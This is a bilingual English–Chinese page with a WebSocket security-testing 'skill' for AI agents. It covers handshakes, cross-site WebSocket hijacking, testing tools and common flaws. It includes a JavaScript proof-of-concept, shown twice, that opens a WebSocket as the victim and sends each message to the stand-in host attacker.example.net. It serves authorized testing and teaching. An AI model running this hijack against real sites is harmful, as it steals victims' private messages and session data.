Back to Details

websocket-security

Compare original and translation side by side

🇺🇸

Original

English
🇨🇳

Translation

Chinese

SKILL: WebSocket Security

技能:WebSocket安全

AI LOAD INSTRUCTION: This skill covers WebSocket protocol basics, cross-site WebSocket hijacking (CSWSH), practical tooling bridges, and common vulnerability classes. Apply only in authorized tests; treat tokens and message content as sensitive. For REST/GraphQL companion testing, cross-load api-sec when present in the workspace.
AI加载说明:本技能涵盖WebSocket协议基础、跨站WebSocket劫持(CSWSH)、实用工具对接方法以及常见漏洞类别。仅可在授权测试中使用;令牌和消息内容属于敏感信息请妥善处理。如需配套测试REST/GraphQL,当工作区存在**api-sec**时可交叉加载该技能。

0. QUICK START

0. 快速开始

During proxy or raw traffic review, watch for:
http
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocol
Server success response indicators:
http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
中文路由提示:在 Burp/浏览器 DevTools 里筛 
101
Upgrade: websocket
;深度 API 测试从 
api-sec
技能对齐认证与授权模型。
在审查代理或原始流量时,留意以下特征:
http
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Key: dGhlIHNhbXBsZSBub25jZQ==
Sec-WebSocket-Version: 13
Sec-WebSocket-Protocol: optional-subprotocol
服务器成功响应的标识:
http
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo=
中文路由提示:在 Burp/浏览器 DevTools 里筛 
101
Upgrade: websocket
;深度 API 测试从 
api-sec
技能对齐认证与授权模型。

1. PROTOCOL BASICS

1. 协议基础

Client request (typical)

客户端请求(典型场景)

  • Upgrade: websocket
     and 
    Connection: Upgrade
     — required upgrade handshake.
  • Sec-WebSocket-Key
     — base64 nonce; server hashes with magic GUID and responds with 
    Sec-WebSocket-Accept
    .
  • Sec-WebSocket-Version: 13
     — current standard version for browser interoperability.
  • Upgrade: websocket
    Connection: Upgrade
     —— 升级握手的必需字段。
  • Sec-WebSocket-Key
     —— base64格式的随机数;服务器会使用固定GUID对其进行哈希,随后通过 
    Sec-WebSocket-Accept
     字段返回结果。
  • Sec-WebSocket-Version: 13
     —— 目前兼容浏览器的标准版本。

Server response

服务器响应

  • HTTP/1.1 101 Switching Protocols
     — handshake complete; subsequent frames are WebSocket binary/text frames per RFC.
Minimal conceptual flow:
text
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, close
  • HTTP/1.1 101 Switching Protocols
     —— 握手完成;后续传输的帧均为符合RFC标准的WebSocket二进制/文本帧。
最简概念流程:
text
Client: HTTP GET + Upgrade headers
Server: 101 + Sec-WebSocket-Accept
Channel: framed messages (text/binary), ping/pong, close

2. CROSS-SITE WEBSOCKET HIJACKING (CSWSH)

2. 跨站WebSocket劫持(CSWSH)

Condition

触发条件

  • The server does not validate 
    Origin
     (or equivalent binding) on the WebSocket handshake, and
  • The victim has an active session (cookie-based or browser-stored creds) to the target site.
Then a malicious page loaded in the victim’s browser may open a WebSocket as the victim, similar in spirit to CSRF but for a persistent bidirectional channel.
  • 服务器在WebSocket握手阶段未校验
    Origin
    (或等效的绑定机制),
  • 受害者在目标站点存在有效会话(基于Cookie或浏览器存储的凭证)。
此时受害者浏览器加载的恶意页面可以伪装成受害者身份建立WebSocket连接,本质类似CSRF,但针对的是持久化双向通道

Proof-of-concept pattern (laboratory / authorized target only)

验证代码模板(仅可用于实验室/授权测试目标)

javascript
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
  fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};
Testing notes: Confirm whether 
Origin
 is checked, whether cookies are sent (
SameSite
rules), and whether subprotocol or custom headers are required—missing checks increase CSWSH risk.
javascript
const ws = new WebSocket('wss://vulnerable.example.com/messages');
ws.onopen = () => { ws.send('HELLO'); };
ws.onmessage = (event) => {
  fetch('https://attacker.example.net/?' + encodeURIComponent(event.data));
};
测试注意事项:确认是否校验**
Origin
、是否会发送Cookie**(受
SameSite
规则约束)、是否要求子协议自定义请求头——缺失相关校验会提升CSWSH风险。

3. TESTING WITH TOOLS

3. 工具测试方法

wsrepl

wsrepl

bash
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.py
Use a plugin to reproduce browser cookies, headers, or token refresh during the WebSocket lifecycle.
bash
pip install wsrepl
wsrepl -u wss://target.example.com/ws -P auth_plugin.py
使用插件在WebSocket生命周期中复现浏览器Cookie、请求头或令牌刷新逻辑。

ws-harness (bridge to HTTP for other tools)

ws-harness(将WebSocket桥接为HTTP供其他工具使用)

bash
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txt
Example downstream use with SQL injection tooling over the bridged HTTP surface (adjust URL to local listener):
bash
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch
bash
python ws-harness.py -u "ws://127.0.0.1:8765/path" -m ./message.txt
通过桥接的HTTP层使用SQL注入工具的下游使用示例(将URL调整为本地监听器地址):
bash
sqlmap -u "http://127.0.0.1:8000/?fuzz=test" --batch

Burp Suite ecosystem

Burp Suite生态工具

  • SocketSleuth — inspect and manipulate WebSocket traffic inside Burp.
  • WebSocket Turbo Intruder — high-rate or scripted message fuzzing.
  • SocketSleuth —— 在Burp内部检查和修改WebSocket流量。
  • WebSocket Turbo Intruder —— 实现高速或脚本化的消息模糊测试。

4. COMMON VULNERABILITIES

4. 常见漏洞

IssueWhy it matters
Missing 
Origin
 validation		Enables CSWSH from attacker-controlled pages
Auth token in URL (
wss://host/ws?token=...
)		Logs, proxies, Referer leakage, browser history
No rate limiting on messagesAbuse, brute force, DoS
ws://
instead of 
wss://
Cleartext on the wire (MITM)
Injection in message bodiesSQLi, command injection, or XSS if content is stored/reflected elsewhere
Example sensitive URL anti-pattern:
text
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
Prefer Sec-WebSocket-Protocol, first-message auth, or cookie + CSRF token patterns aligned with product constraints.
问题影响
缺失 
Origin
 校验		允许攻击者控制的页面发起CSWSH攻击
认证令牌放在URL中
wss://host/ws?token=...
存在日志、代理、Referer泄露、浏览器历史记录泄露风险
消息无速率限制可被滥用、暴力破解、发起DoS攻击
使用**
ws://
而非
wss://
**		传输内容明文可见,易被中间人攻击(MITM)
消息体存在注入风险如果内容会被存储/反射到其他位置,可能引发SQLi、命令注入或XSS
敏感URL反模式示例:
text
wss://api.example.com/stream?access_token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...
优先选择符合产品约束的Sec-WebSocket-Protocol首消息认证Cookie + CSRF令牌方案。

5. DECISION TREE

5. 决策树

  1. Identify endpoint — From JS bundles, Swagger, or 
    101
    responses; note 
    wss
    vs 
    ws
    .
  2. Handshake review — Are 
    Origin
    , Host, and Cookie policies correct? Any token in query string?
  3. Session binding — Reconnect with another user’s cookie jar in Burp; compare subscription topics and data leakage.
  4. CSWSH — Load a local HTML page that connects to the target with victim session active; verify server rejects wrong Origin or uses non-cookie secret.
  5. Message semantics — Fuzz JSON/text payloads for injection; mirror same logic as HTTP API testing.
  6. Transport — Flag 
    ws://
     in production; verify TLS and HSTS alignment.
  1. 识别端点 —— 从JS包、Swagger文档或
    101
    响应中查找;留意是
    wss
    还是
    ws
    协议。
  2. 握手校验 —— 
    Origin
    HostCookie策略是否正确?查询字符串中是否包含令牌?
  3. 会话绑定校验 —— 在Burp中使用其他用户的Cookie jar重连;对比订阅主题和数据泄露情况。
  4. CSWSH测试 —— 加载一个本地HTML页面,在受害者会话激活的状态下连接目标;验证服务器是否拒绝错误的Origin请求,或是否使用了非Cookie的密钥校验。
  5. 消息语义测试 —— 对JSON/文本payload进行模糊测试排查注入风险;采用和HTTP API测试相同的逻辑。
  6. 传输层校验 —— 标记生产环境使用**
    ws://
    **的情况;验证TLS和HSTS配置是否符合要求。

6. RELATED ROUTING

6. 相关关联

  • From api-sec — authentication, authorization, IDOR, and rate limiting often mirror HTTP APIs behind the same WebSocket routes.
中文:WebSocket 常与 REST 共用会话与权限模型;从 
api-sec
对齐同一后端的认证与资源边界。
  • 关联**api-sec** —— 同一WebSocket路由背后的认证、授权、IDOR和速率限制逻辑通常与HTTP API一致
中文:WebSocket 常与 REST 共用会话与权限模型;从 
api-sec
对齐同一后端的认证与资源边界。